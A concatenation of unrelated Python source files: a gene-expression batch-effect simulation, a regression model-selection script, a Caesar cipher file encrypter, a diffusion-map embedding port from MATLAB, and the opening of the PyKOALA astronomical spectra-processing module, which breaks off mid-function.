    # -1 because the "experiment_id" label column is not a gene.
    num_genes = simulated_data.shape[1] - 1

    # Create an array of the simulated data indices
    simulated_ind = np.array(simulated_data.index)

    for i in num_partitions:
        print('Creating simulated data with {} partitions..'.format(i))

        partition_file = os.path.join(
            local_dir,
            "Data",
            "Batch_effects",
            "partition_simulated",
            analysis_name,
            "Partition_" + str(i) + ".txt.xz")

        partition_map_file = os.path.join(
            local_dir,
            "Data",
            "Batch_effects",
            "partition_simulated",
            analysis_name,
            "Partition_map_" + str(i) + ".txt.xz")

        # Create dataframe with grouping
        partition_data_map = simulated_data.copy()

        if i == 1:
            # Single partition: pass data through without noise.
            simulated_data_out = simulated_data.drop(columns="experiment_id")
            simulated_data_out.to_csv(
                partition_file, sep='\t', compression='xz')

            # Add experiment id to map dataframe
            partition_data_map['partition'] = str(i)
            # NOTE(review): .sort() sorts in place and returns None, so
            # pandas receives index=None and keeps the Series' own index.
            partition_data_map_df = pd.DataFrame(
                data=partition_data_map['partition'], index=simulated_ind.sort())

            partition_data_map_df.to_csv(
                partition_map_file, sep='\t', compression='xz')
        else:
            partition_data = simulated_data.copy()

            # Shuffle experiment ids
            experiment_ids = simulated_data["experiment_id"].unique()
            np.random.shuffle(experiment_ids)

            # Partition experiment ids
            # Note: 'array_split' will chunk data into almost equal sized chunks.
            # Returns arrays of size N % i and one array with the remainder
            partition = np.array_split(experiment_ids, i)

            for j in range(i):
                # Randomly select experiment ids
                selected_experiment_ids = partition[j]

                # Get sample ids associated with experiment ids
                sample_ids = list(simulated_data[simulated_data["experiment_id"].isin(
                    partition[j])].index)

                # Vector (one value per gene) to shift gene expression data
                stretch_factor = np.random.normal(0.0, 0.2, [1, num_genes])

                # Tile stretch_factor to be able to add to batches
                num_samples_per_partition = len(sample_ids)

                if j == 0:
                    # Drop experiment_id label to do calculation
                    # (done once; relies on j == 0 being the first iteration)
                    partition_data.drop(columns="experiment_id", inplace=True)

                # NOTE(review): pd.np is deprecated and removed in pandas 2.0;
                # np.tile is the direct replacement -- confirm pandas version.
                stretch_factor_tile = pd.DataFrame(
                    pd.np.tile(
                        stretch_factor,
                        (num_samples_per_partition, 1)),
                    index=partition_data.loc[sample_ids].index,
                    columns=partition_data.loc[sample_ids].columns)

                # Add noise to partition
                partition_data.loc[sample_ids] = partition_data.loc[sample_ids] + \
                    stretch_factor_tile

                # Add partition id to map dataframe
                partition_data_map.loc[sample_ids, 'partition'] = str(j)
                partition_data_map_df = pd.DataFrame(
                    data=partition_data_map['partition'], index=simulated_ind.sort())

            # Save
            partition_data.to_csv(
                partition_file, float_format='%.3f', sep='\t', compression='xz')

            partition_data_map_df.to_csv(
                partition_map_file, sep='\t', compression='xz')
|
<filename>cpm/plot_cpm.py
import Data as dt
import Client as client
import matplotlib.pyplot as plt
from matplotlib import gridspec
import vispy.plot as vp
import numpy as np
from vispy.color import ColorArray
from mpl_toolkits.mplot3d import axes3d
if __name__ == "__main__":
    # load the data
    # fields = ['n_tokens_title','n_tokens_content','n_non_stop_unique_tokens', 'n_unique_tokens']
    # NOTE(review): the first `fields` assignment below is dead -- it is
    # immediately overwritten by the two-column selection.
    fields = ['Temperature', 'Exhaust_Vacuum', 'Ambient_Pressure', 'Relative_Humidity', 'energy_output']
    fields = ['Temperature', 'energy_output']
    # fields = ['Exhaust_Vacuum','Relative_Humidity','energy_output']

    y_column = 1  # should be the order in the input file, not in the "fields" order.

    # data = dt.load_csv("datasets/OnlineNewsPopularity1.csv",fields,y_column)
    data = dt.load_csv("datasets/6CCPP/Folds5x2_pp.csv", fields, y_column)

    # NOTE(review): `global` at module scope is a no-op statement.
    global training_data_model
    # Three-way split: model training, classifier training, and testing.
    training_data_model, training_data_classifier, testing_data = dt.split_data(data)

    training_data_model = training_data_model  # .get_before(500)
    training_data_classifier = training_data_classifier  # .get_before(500)
    testing_data = testing_data  # .get_before(500)

    '''
    fig = vp.Fig(show=False)
    color = (0.8, 0.25, 0.)
    fig1 = fig[0,0]
    fig1.plot(c, symbol='o',width=0.0, marker_size=2.,color=r,face_color= g,edge_color=blue)
    '''
    # fig.show(run=True)

    # Train all candidate models, then gather their predictions on the
    # classifier-training split to learn which model is best where.
    models = client.deploy_all_models(training_data_model)

    answers_for_classifier = client.get_predictions_to_build_classifier(training_data_classifier)
    # Per-model normalized RMSE on the classifier-training split.
    print(answers_for_classifier[0].NRMSE())
    print(answers_for_classifier[1].NRMSE())
    print(answers_for_classifier[2].NRMSE())
    print(answers_for_classifier[3].NRMSE())
    # print(answers_for_classifier[4].NRMSE())

    # Which models the classifier may choose between.
    index = [0, 1, 2, 3]
    # index = [1,2]
    # index = None
    y_classifier, errors = client.init_classifier_training_values(answers_for_classifier, model_selection_index=index,
                                                                  factor=1)
    #####classifier = client.select_classifiers(training_data_classifier, y_classifier, testing_data)
    classifier = client.build_classifier_rbf(training_data_classifier, y_classifier, 100)

    predictions_classified = client.get_classified_predictions(classifier, testing_data)
    print(predictions_classified.NRMSE())

    answers_for_testing = client.get_predictions_from_models_for_testing(testing_data)
    # Per-model normalized RMSE on the test split, for comparison.
    print(answers_for_testing[0].NRMSE())
    print(answers_for_testing[1].NRMSE())
    print(answers_for_testing[2].NRMSE())
    print(answers_for_testing[3].NRMSE())
    # print(answers_for_testing[4].NRMSE())

    y_classifier, errors = client.init_classifier_training_values(answers_for_testing, model_selection_index=index,
                                                                  factor=1)

    # Assemble features + classifier targets for the (disabled) plot below.
    a = np.array(testing_data.features)
    # b = np.array([np.array(training_data_model.labels)])
    # print(b)
    b = np.array(y_classifier).reshape(1, -1)
    # print(a)
    # print(b)
    c = np.concatenate((a, b.T), axis=1)

    #plot_classified_prediction_curves_2D(predictions_classified)
|
"""
CaesarCipherEncrypter v1.0
by 050644zf
Lisence: CC0
"""
# Alphabet lookup tables: uppercase, lowercase, and both concatenated
# (uppercase letters occupy indices 0-25, lowercase 26-51).
upAlp = tuple("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
loAlp = tuple("abcdefghijklmnopqrstuvwxyz")
alp = upAlp + loAlp
def shift(v):
    """Build a Caesar-cipher substitution table for shift *v*.

    Maps every upper- and lower-case ASCII letter to the letter *v*
    positions later in the alphabet, wrapping around and preserving case.

    Parameters
    ----------
    v : int
        Shift amount.  May be negative or larger than 26: the value is
        reduced modulo 26, which also fixes the old single-subtraction
        wrap that mapped uppercase onto lowercase for |v| > 26.

    Returns
    -------
    dict or None
        Mapping of plaintext letter -> ciphertext letter, or None (after
        printing an error) when *v* is not an integer, matching the
        original error behaviour.
    """
    upAlp = tuple("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
    loAlp = tuple("abcdefghijklmnopqrstuvwxyz")
    try:
        offset = v % 26  # normalize any integer shift into [0, 26)
        d = {}
        for i in range(26):
            d[upAlp[i]] = upAlp[(i + offset) % 26]
            d[loAlp[i]] = loAlp[(i + offset) % 26]
        return d
    except TypeError:
        print("Invalid Input")
# main -- interactive Caesar-cipher encryption of a text file.
print("Welcome to use the Caesar Cipher Encrypter.")
print("="*16)

# Source (plaintext) file: read once to learn its length, then reopen so
# the character-by-character loop below starts from the beginning.
ofPath=input("Origin text path: ")
of=open(ofPath,"r")
s=len(of.read())
of=open(ofPath,"r")

# Destination file: open in append mode first so the file exists before
# the non-empty check below.
efPath=input("Encrypted Text Name: ")+".txt"
ef=open(efPath,"a")
ef.close()
ef=open(efPath,"r")

# Ask before clobbering a non-empty output file; loop until the user
# supplies an empty/new file or agrees to overwrite.
while len(ef.read())!=0:
    print("The file "+efPath+" already exist. Do you want to overwrite it?(Y/N):")
    if input()=="N":
        print("Please input a new name:")
        efPath=input("Encrypted Text Name: ")+".txt"
    else:
        # Overwrite: truncate the file and stop asking.
        ef.close()
        open(efPath,"w")
        ef.close()
        break
    ef=open(efPath,"r")
ef.close()
ef=open(efPath,"a")

# Build the substitution table from the user's shift value.
# NOTE(review): this name shadows the built-in `dict` for the rest of the script.
dict=shift(int(input("Shift Value (Integer Only): ")))

# Encrypt character by character; non-letters pass through unchanged.
for i in range(s):
    ot=of.read(1)
    if ot in dict:
        ef.write(dict[ot])
    else:
        ef.write(ot)

of.close()
ef.close()
print("Encrypt Complete!")
|
# Compute the embedding
# ***************************************************************@
#
# NOTE(review): this is a script fragment -- it expects `z_mean` (feature
# means, features x samples) and `inv_c` (a stack of per-sample inverse
# covariance matrices) to already exist in the executing namespace;
# confirm against the caller/notebook that runs it.

import numpy as np

from manifolder_helper import eigs_like_matlab

###
### Part I
###

## Configuration
m = 4000  # starting point for sequantial processing/extension

data = z_mean.T  # set the means as the input set
M = data.shape[0]

# Choose subset of examples as reference
# this is 'take m (4000) random values from z_mean, and sort them
#   subidx = sort(randperm(size(z_mean, 2), m))

# Choose first m examples as reference (commented out, don't do this
#   subidx = 1:m;

subidx = np.arange(z_mean.shape[1])
np.random.shuffle(subidx)  # shuffle is inplace in python
subidx = subidx[:m]  # take a portion of the data
subidx.sort()  # sort is also in place ...

# dataref = data(subidx,:)
dataref = data[subidx, :]

##
# Affinity matrix computation
print('computing Dis matrix ', end='', flush=True)
waitbar_increments = m // 10

# Dis[k, j]: squared distance between sample k and reference sample j,
# weighted by reference j's inverse covariance (Mahalanobis-like).
Dis = np.zeros((M, m))

for j in range(m):
    if j % waitbar_increments == 0:
        print('.', end='')
        # waitbar(j / m, h)   # printing in stead of waitbar

    # tmp1 = inv_c(:,:,subidx(j)) * dataref(j,:)'   # is 40 x 1 in MATLAB
    tmp1 = inv_c[:, :, subidx[j]] @ dataref[j, :].T  # 40, in Python

    a2 = np.dot(dataref[j, :], tmp1)  # a2 is a scalar

    b2 = np.sum(data * (inv_c[:, :, subidx[j]] @ data.T).T, 1)

    ab = data @ tmp1  # only @ works here

    # this tiles the matrix ... repmat is like np.tile
    # Dis[:,j] = repmat[a2, M, 1] + b2 - 2*ab
    Dis[:, j] = (np.tile(a2, [M, 1])).flatten() + b2 - 2*ab

print('done!')

## Anisotropic kernel
print('aniostropic kernel ... ', end='')

ep = np.median(np.median(Dis, 0))  # default scale - should be adjusted for each new realizations

A = np.exp(-Dis / (4*ep))  # is numpy okay with exponential of matrices? okay, calculates them individually
W_sml = A.T @ A

# Two rounds of density normalization before forming the final kernel W2.
d1 = np.sum(W_sml, 0)
A1 = A / np.tile(np.sqrt(d1), [M, 1])
W1 = A1.T @ A1

d2 = np.sum(W1, 0)
A2 = A1 / np.tile(np.sqrt(d2), [M, 1])
W2 = A2.T @ A2

D = np.diag(np.sqrt(1 / d2))

###
### Part II
###

# Compute eigenvectors
#
# in numpy,
#   from numpy import linalg as LA
#   w, v = LA.eig(np.diag((1, 2, 3)))
# v are the values, diagonal in a matrix, and w are the eigenvectors
# [V, E] = eigs(W2, 10)    Matlab
V, E = eigs_like_matlab(W2, 10)  # think this is correct now ...

#print('V.shape', V.shape)
#print('E.shape', E.shape)

# python np.sum(A,0) <=> matlab sum(A)
# in matlab, srted are the values of sum(E) sorted (in descending order)
# and IE are the indices that sorted them
# [srtdE, IE] = sort(sum(E), 'descend')
# this is python eqivalent ... note that IE will have values one less than the MATLAB, because zero indexing
# TODO - is this sorted right?
IE = np.sum(E, 0).argsort()[::-1]  # find the indices to sort, and reverse them
srtdE = np.sum(E, 0)[IE]

# Phi = D @ V(:, IE(1, 2:10))
# Skip the first (largest, trivial) eigenvector; keep the remaining ones.
Phi = D @ V[:, IE[1:]]

print('done')

###
### Part III
###

# TODO - not necessary? (Independent coordinates?)

# Extend reference embedding to the entire set
print('extending embedding (building Psi) ... ', end='', flush=True)

Psi_list = []  # holds all the psi_i values

omega = np.sum(A2, 1)
A2_nrm = A2 / np.tile(omega.reshape([-1, 1]), [1, m])  # omega needed to be shaped as a column

# for i=1:size(Phi,2)
for i in range(Phi.shape[1]):
    # this line is strange ... order of operations for @?, what is the offset?
    psi_i = A2_nrm @ Phi[:, i] / np.sqrt((srtdE[i + 1]))
    # [Psi, psi_i]
    Psi_list.append(psi_i)

# convert Psi_list back into an array, shaped like MATLAB version
Psi = np.array(Psi_list).T

# psi have have very small imaginary values ...
# cast to real here, but need to check
Psi = np.real(Psi)

# print('Psi.shape', Psi.shape)
print('done')

# Since close to a degenerate case - try to rotate according to:
# <NAME> and <NAME>, "Spectral ICA", ACHA 2007.
#
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# # PyKOALA: KOALA data processing and analysis
# by <NAME> and <NAME>
# Extra work by <NAME> (MQ PACE student)
# Plus Taylah and Matt (sky subtraction)
from __future__ import absolute_import, division, print_function
from past.utils import old_div
version = "Version 0.72 - 13th February 2020"
import copy
import os.path as pth
import sys
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from astropy.io import fits
from astropy.wcs import WCS
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
from scipy import interpolate
from scipy.ndimage.interpolation import shift
import scipy.signal as sig
from .constants import C, PARSEC as pc
from .utils.cube_alignment import offset_between_cubes, compare_cubes, align_n_cubes
from .utils.flux import search_peaks, fluxes, dfluxes, substract_given_gaussian
from .utils.io import read_table, save_rss_fits, save_fits_file
from .utils.moffat import fit_Moffat
from .utils.plots import (
plot_redshift_peaks, plot_weights_for_getting_smooth_spectrum,
plot_correction_in_fibre_p_fibre, plot_suspicious_fibres_graph, plot_skyline_5578,
plot_offset_between_cubes, plot_response, plot_telluric_correction, plot_plot
)
from .utils.sky_spectrum import scale_sky_spectrum, median_filter
from .utils.spectrum_tools import rebin_spec_shift, smooth_spectrum
from .utils.utils import (
FitsExt, FitsFibresIFUIndex, coord_range, median_absolute_deviation,
)
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
# -----------------------------------------------------------------------------
# Define constants
# -----------------------------------------------------------------------------
# Location of the package's bundled data files.
DATA_PATH = pth.join(pth.dirname(__file__), "data")

# -----------------------------------------------------------------------------
# Define COLOUR scales
# -----------------------------------------------------------------------------
# "fuego": dark-red -> red -> orange -> yellow -> white ramp.
fuego_color_map = colors.LinearSegmentedColormap.from_list(
    "fuego",
    (
        (0.25, 0, 0),
        (0.5, 0, 0),
        (1, 0, 0),
        (1, 0.5, 0),
        (1, 0.75, 0),
        (1, 1, 0),
        (1, 1, 1),
    ),
    N=256,
    gamma=1.0,
)
fuego_color_map.set_bad("lightgray")  # masked/NaN pixels render light gray
# NOTE(review): plt.register_cmap is deprecated in newer matplotlib
# (matplotlib.colormaps.register is the replacement) -- confirm the
# supported matplotlib version for this package.
plt.register_cmap(cmap=fuego_color_map)

# Per-channel ramps (orange/green/blue) kept for building custom colormaps.
projo = [0.25, 0.5, 1, 1.0, 1.00, 1, 1]
pverde = [0.00, 0.0, 0, 0.5, 0.75, 1, 1]
pazul = [0.00, 0.0, 0, 0.0, 0.00, 0, 1]
# -----------------------------------------------------------------------------
# RSS CLASS
# -----------------------------------------------------------------------------
class RSS(object):
"""
Collection of row-stacked spectra (RSS).
Attributes
----------
wavelength: np.array(float)
Wavelength, in Angstroms.
intensity: np.array(float)
Intensity :math:`I_\lambda` per unit wavelength.
variance: np.array(float)
Variance :math:`\sigma^2_\lambda` per unit wavelength
(note the square in the definition of the variance).
"""
# -----------------------------------------------------------------------------
def __init__(self):
self.description = "Undefined row-stacked spectra (RSS)"
self.n_spectra = 0
self.n_wave = 0
self.wavelength = np.zeros((0))
self.intensity = np.zeros((0, 0))
self.intensity_corrected = self.intensity
self.variance = np.zeros_like(self.intensity)
self.RA_centre_deg = 0.0
self.DEC_centre_deg = 0.0
self.offset_RA_arcsec = np.zeros((0))
self.offset_DEC_arcsec = np.zeros_like(self.offset_RA_arcsec)
self.ALIGNED_RA_centre_deg = 0.0 # Added by ANGEL, 6 Sep
self.ALIGNED_DEC_centre_deg = 0.0 # Added by ANGEL, 6 Sep
self.relative_throughput = np.ones((0)) # Added by ANGEL, 16 Sep
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def compute_integrated_fibre(
        self,
        list_spectra="all",
        valid_wave_min=0,
        valid_wave_max=0,
        min_value=0.1,
        plot=False,
        title=" - Integrated values",
        warnings=True,
        text="...",
        correct_negative_sky=False,
    ):
        """
        Compute the integrated flux of each fibre in [valid_wave_min, valid_wave_max].

        Stores the result in self.integrated_fibre (length self.n_spectra) and,
        optionally, corrects negative sky values in self.intensity_corrected.

        Parameters
        ----------
        list_spectra: list of int or "all" (default "all")
            Fibre indices for computing the integrated value; "all" uses every fibre.
            NOTE(review): this argument is normalised below but the main loop always
            iterates over ALL fibres — confirm whether a subset was ever intended.
        valid_wave_min, valid_wave_max : float
            Integration range; if both are 0 (the default), the instance attributes
            self.valid_wave_min / self.valid_wave_max are used instead.
        min_value: float (default 0.1)
            When correct_negative_sky is False, fibres with negative integrated flux
            are set to this value (for presentation purposes only).
        plot : Boolean (default = False)
            If True, show a map of the integrated values via self.RSS_map.
        title : string
            Title for the plot.
        text: string
            A bit of extra text appended to the progress message.
        warnings : Boolean (default = True)
            Print a warning for every fibre whose integrated flux is negative.
        correct_negative_sky : Boolean (default = False)
            Subtract the lowest fibre's integrated flux from every fibre (and the
            corresponding per-wavelength value from intensity_corrected) so the
            lowest fibre ends with an integrated flux of 0.

        Example
        ----------
        integrated_fibre_6500_6600 = star1r.compute_integrated_fibre(valid_wave_min=6500, valid_wave_max=6600,
        title = " - [6500,6600]", plot = True)
        """
        print("\n  Computing integrated fibre values {}".format(text))
        if list_spectra == "all":
            list_spectra = list(range(self.n_spectra))
        # 0 means "use the instance's valid range".
        if valid_wave_min == 0:
            valid_wave_min = self.valid_wave_min
        if valid_wave_max == 0:
            valid_wave_max = self.valid_wave_max
        self.integrated_fibre = np.zeros(self.n_spectra)
        # Wavelength indices inside the requested integration window.
        region = np.where(
            (self.wavelength > valid_wave_min) & (self.wavelength < valid_wave_max)
        )
        waves_in_region = len(region[0])
        n_negative_fibres = 0
        negative_fibres = []
        for i in range(self.n_spectra):
            # nansum so NaN pixels do not poison the integral.
            self.integrated_fibre[i] = np.nansum(self.intensity_corrected[i, region])
            if self.integrated_fibre[i] < 0:
                if warnings:
                    print(
                        "  WARNING: The integrated flux in fibre {:4} is negative, flux/wave = {:10.2f}, (probably sky), CHECK !".format(
                            i, self.integrated_fibre[i]/waves_in_region
                        ))
                n_negative_fibres = n_negative_fibres + 1
                # self.integrated_fibre[i] = min_value
                negative_fibres.append(i)
        if len(negative_fibres) != 0:
            print("\n> Number of fibres with integrated flux < 0 : {:4}, that is the {:5.2f} % of the total !".format(
                n_negative_fibres, n_negative_fibres * 100.0 / self.n_spectra
            ))
            # Sort ALL fibres by integrated flux per wavelength; the first
            # n_negative_fibres entries are the most negative ones.
            negative_fibres_sorted = []
            integrated_intensity_sorted = np.argsort(
                self.integrated_fibre/waves_in_region
            )
            for fibre_ in range(n_negative_fibres):
                negative_fibres_sorted.append(integrated_intensity_sorted[fibre_])
            # print "\n> Checking results using",n_negative_fibres,"fibres with the lowest integrated intensity"
            # print "  which are :",negative_fibres_sorted
            if correct_negative_sky:
                # Shift every fibre so the lowest one integrates to exactly 0.
                min_sky_value = self.integrated_fibre[negative_fibres_sorted[0]]
                min_sky_value_per_wave = min_sky_value/waves_in_region
                print(
                    "\n> Correcting negative values making 0 the integrated flux of the lowest fibre, which is {:4} with {:10.2f} counts/wave".format(
                        negative_fibres_sorted[0], min_sky_value_per_wave
                    ))
                # print self.integrated_fibre[negative_fibres_sorted[0]]
                self.integrated_fibre = self.integrated_fibre - min_sky_value
                for i in range(self.n_spectra):
                    self.intensity_corrected[i] = (
                        self.intensity_corrected[i] - min_sky_value_per_wave
                    )
            else:
                # Presentation-only clamp: negative fibres shown as min_value.
                print(
                    "\n> Adopting integrated flux = {:5.2f} for all fibres with negative integrated flux (for presentation purposes)".format(
                        min_value
                    ))
                for i in negative_fibres_sorted:
                    self.integrated_fibre[i] = min_value
        # for i in range(self.n_spectra):
        # if self.integrated_fibre[i] < 0:
        # if warnings: print "  WARNING: The integrated flux in fibre {:4} STILL is negative, flux/wave = {:10.2f}, (probably sky), CHECK !".format(i,self.integrated_fibre[i]/waves_in_region)
        if plot:
            # print"\n  Plotting map with integrated values:"
            self.RSS_map(
                self.integrated_fibre,
                norm=colors.PowerNorm(gamma=1.0 / 4.0),
                title=title,
            )
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
    def identify_el(
        self,
        high_fibres=10,
        brightest_line="Ha",
        cut=1.5,
        fibre=0,
        broad=1.0,
        verbose=True,
        plot=True,
    ):
        """
        Identify emission lines in the data.

        With fibre=0 (default): stack the high_fibres fibres with the highest
        integrated intensity into a single spectrum and identify the emission
        features there — these should be the features expected over the whole cube.
        With fibre=N: identify emission lines in that particular fibre only.

        Parameters
        ----------
        high_fibres: integer (default 10)
            Use the high_fibres highest-intensity fibres for identifying lines.
        brightest_line : string (default "Ha")
            Name of the emission line expected to be the brightest in the
            integrated spectrum (passed through to search_peaks).
        cut: float (default 1.5)
            A peak must exceed this cut (peak/continuum) to count as an emission line.
        fibre: integer (default 0)
            If non-zero, identify emission lines in this single fibre instead.
        broad: float (default 1.0)
            Expected FWHM of the emission lines (initial guess for the Gaussian fits).
        verbose : boolean (default = True)
            Write results.
        plot : boolean (default = True)
            Plot the peak search and each Gaussian fit.

        Returns
        -------
        list
            [peaks_name, peaks_rest, p_peaks_l, p_peaks_fwhm]: line names, rest
            wavelengths, fitted centres and fitted FWHMs (one entry per peak).

        Example
        ----------
        self.el=self.identify_el(high_fibres=10, brightest_line = "Ha",
        cut=2., verbose=True, plot=True, fibre=0, broad=1.5)
        """
        if fibre == 0:
            # Pick the high_fibres brightest fibres (argsort is ascending,
            # so take entries from the end). NOTE: the loop variable reuses
            # the name of the `fibre` parameter.
            integrated_intensity_sorted = np.argsort(self.integrated_fibre)
            region = []
            for fibre in range(high_fibres):
                region.append(integrated_intensity_sorted[-1 - fibre])
            if verbose:
                print("\n> Identifying emission lines using the {} fibres with the highest integrated intensity".format(high_fibres))
                print("  which are : {}".format(region))
            combined_high_spectrum = np.nansum(self.intensity_corrected[region], axis=0)
        else:
            combined_high_spectrum = self.intensity_corrected[fibre]
            if verbose:
                print("\n> Identifying emission lines in fibre {}".format(fibre))
        # Search peaks
        peaks, peaks_name, peaks_rest, continuum_limits = search_peaks(
            self.wavelength,
            combined_high_spectrum,
            plot=plot,
            cut=cut,
            brightest_line=brightest_line,
            verbose=False,
        )
        p_peaks_l = []
        p_peaks_fwhm = []
        # Do Gaussian fit and provide center & FWHM (flux could be also included, not at the moment as not abs. flux-cal done)
        if verbose:
            print("\n  Emission lines identified:")
        for eline in range(len(peaks)):
            # Continuum windows on each side of the line, as returned by search_peaks.
            lowlow = continuum_limits[0][eline]
            lowhigh = continuum_limits[1][eline]
            highlow = continuum_limits[2][eline]
            highhigh = continuum_limits[3][eline]
            resultado = fluxes(
                self.wavelength,
                combined_high_spectrum,
                peaks[eline],
                verbose=False,
                broad=broad,
                lowlow=lowlow,
                lowhigh=lowhigh,
                highlow=highlow,
                highhigh=highhigh,
                plot=plot,
                fcal=False,
            )
            # resultado[1] = fitted centre, resultado[5] = fitted FWHM
            # (presumably the same convention as the other fluxes() calls in
            # this file — confirm against utils.flux.fluxes).
            p_peaks_l.append(resultado[1])
            p_peaks_fwhm.append(resultado[5])
            if verbose:
                print("  {:3}. {:7s} {:8.2f} centered at {:8.2f} and FWHM = {:6.2f}".format(
                    eline + 1,
                    peaks_name[eline],
                    peaks_rest[eline],
                    p_peaks_l[eline],
                    p_peaks_fwhm[eline],
                ))
        return [peaks_name, peaks_rest, p_peaks_l, p_peaks_fwhm]
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def correct_high_cosmics_and_defects(
self,
step=50,
correct_high_cosmics=False,
fibre_p=0,
remove_5578=False, # if fibre_p=fibre plots the corrections in that fibre
clip_high=100,
warnings=False,
plot=True,
plot_suspicious_fibres=True,
verbose=False,
fig_size=12,
):
"""
Task for correcting high cosmics and CCD defects using median values of nearby pixels.
2dFdr corrects for (the majority) of the cosmic rays, usually correct_high_cosmics = False.
ANGEL COMMENT: Check, probably can be improved using MATT median running + plotting outside
Parameters
----------
rect_high_cosmics: boolean (default = False)
Correct ONLY CCD defects
re_p: integer (default = 0)
Plots the corrections in fibre fibre_p
ove_5578: boolean (default = False)
Removes skyline 5578 (blue spectrum) using Gaussian fit
ND CHECK: This also MODIFIES the throughput correction correcting for flux_5578_medfilt /median_flux_5578_medfilt
step: integer (default = 50)
Number of points for calculating median value
clip_high : float (default = 100)
Minimum value of flux/median in a pixel to be consider as a cosmic
if s[wave] > clip_high*fit_median[wave] -> IT IS A COSMIC
verbose: boolean (default = False)
Write results
warnings: boolean (default = False)
Write warnings
plot: boolean (default = False)
Plot results
plot_suspicious_fibres: boolean (default = False)
Plots fibre(s) that could have a cosmic left (but it could be OK)
IF self.integrated_fibre[fibre]/median_running[fibre] > max_value -> SUSPICIOUS FIBRE
Example
----------
self.correct_high_cosmics_and_defects(correct_high_cosmics=False, step=40, remove_5578 = True,
clip_high=120, plot_suspicious_fibres=True, warnings=True, verbose=False, plot=True)
"""
print("\n> Correcting for high cosmics and CCD defects...")
wave_min = self.valid_wave_min # CHECK ALL OF THIS...
wave_max = self.valid_wave_max
wlm = self.wavelength
if correct_high_cosmics == False:
print(" Only CCD defects (nan and negative values) are considered.")
else:
print(" Using clip_high = {} for high cosmics".format(clip_high))
print(" IMPORTANT: Be sure that any emission or sky line is fainter than clip_high/continuum !! ")
flux_5578 = [] # For correcting sky line 5578 if requested
if wave_min < 5578 and remove_5578:
print(" Sky line 5578 will be removed using a Gaussian fit...")
integrated_fibre_uncorrected = self.integrated_fibre
print(" ")
output_every_few = np.sqrt(self.n_spectra) + 1
next_output = -1
max_ratio_list = []
for fibre in range(self.n_spectra):
if fibre > next_output:
sys.stdout.write("\b" * 30)
sys.stdout.write(
" Cleaning... {:5.2f}% completed".format(
fibre * 100.0 / self.n_spectra
)
)
sys.stdout.flush()
next_output = fibre + output_every_few
s = self.intensity_corrected[fibre]
running_wave = []
running_step_median = []
cuts = np.int(self.n_wave/step) # using np.int instead of // for improved readability
for cut in range(cuts):
if cut == 0:
next_wave = wave_min
else:
next_wave = np.nanmedian(
(wlm[np.int(cut * step)] + wlm[np.int((cut + 1) * step)])/2
)
if next_wave < wave_max:
running_wave.append(next_wave)
# print("SEARCHFORME1", step, running_wave[cut])
region = np.where(
(wlm > running_wave[cut] - np.int(step/2)) # step/2 doesn't need to be an int, but probably
& (wlm < running_wave[cut] + np.int(step/2)) # want it to be so the cuts are uniform.
)
# print('SEARCHFORME3', region)
running_step_median.append(
np.nanmedian(self.intensity_corrected[fibre, region])
)
running_wave.append(wave_max)
region = np.where((wlm > wave_max - step) & (wlm < wave_max))
running_step_median.append(
np.nanmedian(self.intensity_corrected[fibre, region])
)
for i in range(len(running_step_median)):
if np.isnan(running_step_median[i]) == True:
if i < 10:
running_step_median[i] = np.nanmedian(running_step_median[0:9])
if i > 10:
running_step_median[i] = np.nanmedian(
running_step_median[-9:-1]
)
a7x, a6x, a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
running_wave, running_step_median, 7
)
fit_median = (
a0x
+ a1x * wlm
+ a2x * wlm ** 2
+ a3x * wlm ** 3
+ a4x * wlm ** 4
+ a5x * wlm ** 5
+ a6x * wlm ** 6
+ a7x * wlm ** 7
)
if fibre == fibre_p:
espectro_old = copy.copy(self.intensity_corrected[fibre, :])
espectro_fit_median = fit_median
for wave in range(self.n_wave): # (1,self.n_wave-3):
if s[wave] < 0:
s[wave] = fit_median[wave] # Negative values for median values
if np.isnan(s[wave]) == True:
s[wave] = fit_median[wave] # nan for median value
if (
correct_high_cosmics and fit_median[wave] > 0
): # NEW 15 Feb 2019, v7.1 2dFdr takes well cosmic rays
if s[wave] > clip_high * fit_median[wave]:
if verbose:
print(" "
"CLIPPING HIGH = {} in fibre {} w = {} value= {} v/median= {}".format(clip_high, fibre, wlm[wave], s[wave], s[wave]/fit_median[wave])) # " median=",fit_median[wave]
s[wave] = fit_median[wave]
if fibre == fibre_p:
espectro_new = copy.copy(s)
max_ratio_list.append(np.nanmax(s/fit_median))
self.intensity_corrected[fibre, :] = s
# Removing Skyline 5578 using Gaussian fit if requested
if wave_min < 5578 and remove_5578:
resultado = fluxes(
wlm, s, 5578, plot=False, verbose=False
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[fibre] = resultado[11]
flux_5578.append(resultado[3])
sys.stdout.write("\b" * 30)
sys.stdout.write(" Cleaning... 100.00 completed")
sys.stdout.flush()
max_ratio = np.nanmax(max_ratio_list)
print("\n Maximum value found of flux/continuum = {}".format(max_ratio))
if correct_high_cosmics:
print(" Recommended value for clip_high = {} , here we used {}".format(int(max_ratio + 1), clip_high))
# Plot correction in fibre p_fibre
if fibre_p > 0:
plot_correction_in_fibre_p_fibre(fig_size,
wlm,
espectro_old,
espectro_fit_median,
espectro_new,
fibre_p,
clip_high)
# print" "
if correct_high_cosmics == False:
text = "for spectra corrected for defects..."
title = " - Throughput + CCD defects corrected"
else:
text = "for spectra corrected for high cosmics and defects..."
title = " - Throughput + high-C & D corrected"
self.compute_integrated_fibre(
valid_wave_min=wave_min,
valid_wave_max=wave_max,
text=text,
plot=plot,
title=title,
)
if plot:
print(" Plotting integrated fibre values before and after correcting for high cosmics and CCD defects:\n")
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(integrated_fibre_uncorrected, "r", label="Uncorrected", alpha=0.5)
plt.ylabel("Integrated Flux")
plt.xlabel("Fibre")
plt.ylim(
